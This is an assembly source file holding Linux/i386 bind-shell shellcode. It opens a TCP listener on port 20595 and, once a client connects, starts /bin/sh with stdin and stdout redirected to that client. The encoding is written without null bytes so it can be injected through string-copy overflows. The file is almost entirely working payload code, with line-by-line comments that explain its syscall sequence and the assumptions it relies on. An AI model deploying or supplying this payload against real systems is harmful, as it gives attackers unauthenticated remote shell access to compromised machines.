/*
 * Linux/i386 TCP bind-shell payload (AT&T syntax, raw int $0x80 syscalls).
 *
 *   socket(AF_INET, SOCK_STREAM, 0)
 *   bind(fd, {family 0, port 0x5073, INADDR_ANY}, 16)
 *   listen(fd, <large>)
 *   client = accept(fd, NULL, <ignored>)
 *   dup2(client, 0); dup2(client, 1)          -- stderr is NOT redirected
 *   execve("//bin/sh", ["//bin/sh", NULL], NULL)
 *
 * cbegin/cend are exported, presumably so a harness can copy the raw bytes
 * between the two labels (the consumer is not visible here).
 *
 * Properties this sequence depends on; a reviewer should keep them in mind
 * before "fixing" anything:
 *  - 32-bit only: int $0x80 with the i386 socketcall multiplexer (eax=0x66,
 *    ebx=call number, ecx=pointer to the argument array on the stack).
 *  - No error checking at all. Each "movb $nn, %al" rewrites only the low
 *    byte and silently assumes bits 8..31 of %eax are zero, i.e. that the
 *    previous syscall returned a small non-negative value (an fd < 256, or 0).
 *    A failed call leaves -errno in %eax and derails the next syscall number.
 *  - Byte/word-sized immediates (incb, movb, pushw, push $imm8) are used so
 *    that no 0x00 byte appears in the encoding (string-copy friendly).
 *  - %edx is zeroed by cdq and reused as several zero arguments; it is
 *    re-zeroed by a second cdq before execve.
 */
.globl cbegin
.globl cend
cbegin:
/* socket(AF_INET=2, SOCK_STREAM=1, 0) via socketcall(SYS_SOCKET=1, args) */
xorl %eax, %eax		/* eax = 0 */
cdq			/* edx = 0 (sign-extension of eax) */
push %eax		/* args[2] = protocol 0 */
incb %al
movl %eax, %ebx		/* ebx = 1 = SYS_SOCKET */
push %eax		/* args[1] = SOCK_STREAM (1) */
incb %al
push %eax		/* args[0] = AF_INET (2) */
movl %esp, %ecx		/* ecx = &args */
movb $0x66, %al		/* eax = 0x66 = socketcall (eax was 2, upper bytes 0) */
int $0x80		/* eax = listening socket fd; assumed >= 0 and < 256 */
/* bind(fd, &sa, 16) via SYS_BIND=2. Only 8 bytes of sockaddr_in are built
   on the stack; the remaining 8 bytes covered by addrlen 16 are whatever
   lies above (the socket() args). sin_zero is not checked for AF_INET bind. */
push %edx		/* sin_addr = 0 = INADDR_ANY */
pushw $0x7350		/* sin_port: stored little-endian as bytes 50 73, which in
			   network byte order is 0x5073 = TCP port 20595 */
pushw %dx		/* sin_family = 0 (AF_UNSPEC), not AF_INET (2). Linux's
			   inet_bind tolerates family 0 only because sin_addr is
			   INADDR_ANY -- Linux-specific behaviour, not portable */
movl %esp, %edx		/* edx = &sa (edx is non-zero from here on) */
push $0x10		/* args[2] = addrlen 16 */
push %edx		/* args[1] = &sa */
push %eax		/* args[0] = socket fd */
movl %esp, %ecx		/* ecx = &args; deliberately left in place for listen() */
incb %bl		/* ebx = 2 = SYS_BIND */
movl %eax, %edx		/* edx = socket fd, kept for accept() */
movb $0x66, %al		/* eax = 0x66 (fd < 256 assumed) */
int $0x80		/* returns 0 on success */
/* listen(fd, backlog) via SYS_LISTEN=4. ecx still points at bind's argument
   block, so "backlog" is actually the &sa pointer value; the kernel clamps
   backlog to somaxconn, so any large value works. eax is 0 from bind. */
addb $0x02, %bl		/* ebx = 4 = SYS_LISTEN */
movb $0x66, %al
int $0x80		/* returns 0 on success */
/* accept(fd, NULL, <ignored>) via SYS_ACCEPT=5. The third argument slot is
   the old args[0] word (the fd), which the kernel ignores when addr is NULL. */
push %eax		/* args[1] = 0 (listen's return) = NULL addr */
push %edx		/* args[0] = listening fd */
movl %esp, %ecx		/* ecx = &args */
incb %bl		/* ebx = 5 = SYS_ACCEPT */
movb $0x66, %al
int $0x80		/* blocks for a client; eax = connected client fd */
/* dup2(client, 0); dup2(client, 1). fd 2 is left alone, so the shell's
   stderr still points wherever the host process's stderr pointed -- error
   output (e.g. "command not found") never reaches the remote side. */
movl %eax, %ebx		/* ebx = client fd */
xorl %ecx, %ecx		/* ecx = 0 = stdin */
movb $0x3f, %al		/* eax = 0x3f = dup2 (client fd < 256 assumed) */
int $0x80		/* returns 0 */
incb %cl		/* ecx = 1 = stdout */
movb $0x3f, %al		/* eax = 0x3f again (eax was 0) */
int $0x80		/* returns 1 */
/* execve("//bin/sh", ["//bin/sh", NULL], NULL)
   execve shell (by lorian, see execve.s) - slightly modified */
movb $0x0b, %al		/* eax = 0x0b = execve (eax was 1, upper bytes 0) */
cdq			/* edx = 0 again: string terminator, argv[1], envp */
pushl %edx		/* NUL terminator for the path string */
/* Original form used two dword pushes; the "slight modification" splits
   them into four word pushes (reason not stated in this file):
   push $0x68732F6E
   push $0x69622F2F */
pushw $0x6873		/* "sh" */
pushw $0x2f6e		/* "n/" */
pushw $0x6962		/* "bi" */
pushw $0x2f2f		/* "//"  -> esp now points at "//bin/sh\0" */
movl %esp, %ebx		/* ebx = filename */
pushl %edx		/* argv[1] = NULL */
pushl %ebx		/* argv[0] = filename */
movl %esp, %ecx		/* ecx = argv; edx = envp = NULL */
int $0x80		/* does not return on success; on failure execution
			   falls through past cend into whatever follows */
cend: